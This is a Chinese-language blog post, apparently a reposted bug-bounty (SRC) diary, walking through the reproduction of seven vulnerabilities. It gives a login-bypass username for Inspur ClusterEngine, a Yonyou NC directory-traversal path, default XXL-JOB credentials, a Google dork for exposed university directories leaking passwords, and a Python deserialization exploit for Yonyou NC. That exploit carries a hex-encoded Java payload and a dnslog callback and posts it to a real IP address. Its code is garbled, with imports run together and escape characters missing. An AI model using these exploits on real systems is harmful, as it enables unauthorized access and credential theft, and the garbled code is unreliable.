SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

admin
admin
admin
107107
文章
89
评论
2023年8月5日20:17:12评论44 views字数 2245阅读7分29秒阅读模式

前期的成果

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

结合HW泄露的新漏洞利用(挖掘)的合集

1.浪潮ClusterEngineV4.0 任意用户登录漏洞


用户名为admin|pwd,密码任意,登陆进控制台且用户有一定权限

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现



修复建议:过滤非法字符(|),上交大学的系统就这样修复的漏洞

 

2.SonarQube api 信息泄露漏洞 CVE-2020-27986

漏洞URL:

/api/settings/values

泄露部分的敏感信息

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

 

3.用友ERP-NC 目录遍历漏洞

exp:

/NCFindWeb?service=IPreAlertConfigService&filename=

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

 

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

需要读取文件则在filename后添加文件名

/NCFindWeb?service=IPreAlertConfigService&filename=menu.jsp

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

遇到目录名则用./进行穿越

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

 

4.XXL-JOB 任务调度中心 后台默认弱口令

admin/123456

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

 

5.SRC敏感信息泄露

敏感信息不是第一次挖了,这次是google语法梭了一把,找有目录遍历的网站

site:edu.cn intitle:index.of

找到某大学的采购平台,遍历发现会上传日志文件,日志文件包含登陆邮箱和密码

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

 

6.用友 NC XbrlPersistenceServlet反序列化(只有exp,没复现成功)

今年红队打过的漏洞


import requestsimport threadpoolimport urllib3import sysimport base64
#目前测试影响版本:nc6.5#漏洞url为:#/service/~xbrl/XbrlPersistenceServlet
 dnslog = "x74x62x6bx37x70x6ax2ex63x65x79x65x2ex69x6f"#dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显 
 data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78" uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} req = requests.post("http://183.234.129.162:889/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25) 
 print (req.text)


dnslog上一直没有回显,试了很多站(受影响版本不是很好找)

 

7.Tomcat example漏洞

某学校的洞,看我同学在火线SRC交过才知道这种是能算洞的(默默打开之前一顿乱扫的awvs,找到了这个库存漏洞)

搭建网站后未删除模板,导致会产生风险

session 样例中(/examples/servlets/servlet/SessionExample)允许用户对 session 进行操纵,可被黑客利用来绕过网站验证机制直接登录后台。

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

作者: ch0bits

出处:https://www.cnblogs.com/echoDetected/p/14658251.html


往期推荐

SRC漏洞挖掘-从零到1的历程记录

常见web安全漏洞

白嫖fofa会员

SQL注入介绍

批量漏洞挖掘思路小结

资深渗透测试工程师整理的一些学习资料及技巧



原文始发于微信公众号(黑战士):SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月5日20:17:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SRC漏洞挖掘-从零到1的历程记录 (二)漏洞复现https://cn-sec.com/archives/738921.html

发表评论

匿名网友 填写信息